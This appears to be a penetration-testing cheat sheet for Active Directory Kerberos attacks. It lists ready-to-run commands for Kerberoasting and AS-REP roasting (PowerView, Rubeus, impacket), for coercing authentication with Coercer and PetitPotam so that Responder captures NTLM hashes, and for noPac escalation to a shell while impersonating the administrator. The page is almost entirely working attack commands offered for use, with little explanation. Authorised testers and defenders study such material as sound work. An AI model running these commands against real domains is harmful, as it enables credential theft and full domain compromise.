Skip to main content

Kerberos Attacks

Kerberoasting

Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password.

Vulnerability detection

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser -SPN

Windows

PowerView

Import-Module .\PowerView.ps1
Invoke-Kerberoast

Rubeus

.\Rubeus.exe kerberoast /nowrap

Linux

impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass

AS-REP Roasting

Do not require Kerberos preauthentication

Windows

  • PowerView Manual
Get-ADUser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
  • PowerView Auto
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
  • Rubeus
.\Rubeus.exe asreproast /user:full.name /domain:domain.local /dc:dc01.domain.local

Linux

impacket-GetNPUsers domain.local/ -no-pass -request -k -usersfile users.txt

Coerced Authentication

Coercer (rpc)

python3 Coercer.py coerce -d domain.local --target-ip 10.10.10.x -l 10.10.10.x --always-continue

PetitPotam

Setup Responder

sudo responder -I tun0

Run PetitPotam to coerce and send you the NTLM hash

Your ip: 10.10.10.x Victim ip: 10.10.10.y

python3 PetitPotam.py 10.10.10.x 10.10.10.y -u 'svc_user' -p 'password1'

Guest user

python3 PetitPotam.py 10.10.10.x 10.10.10.y -u '' -p ''

NoPac

Python

faketime -f +7h python3 noPac.py domain.local/user1:'Password1' -dc-ip 10.10.10.x -use-ldap -shell --impersonate administrator

PowerShell

Invoke-noPac

Scan the network

Invoke-noPac -Command "scan -domain domain.local -user user1 -pass Password1"

Add a computer account

Invoke-noPac -Command "-domain domain.local -user winrm_svc -pass test111!! /enctype rc4 /dc dc01.domain.local /mAccount testmachine /mPassword testmachinepass /service cifs /ptt"
noPac
.\noPac.exe scan -domain domain.local -user user1 -pass 'Password1'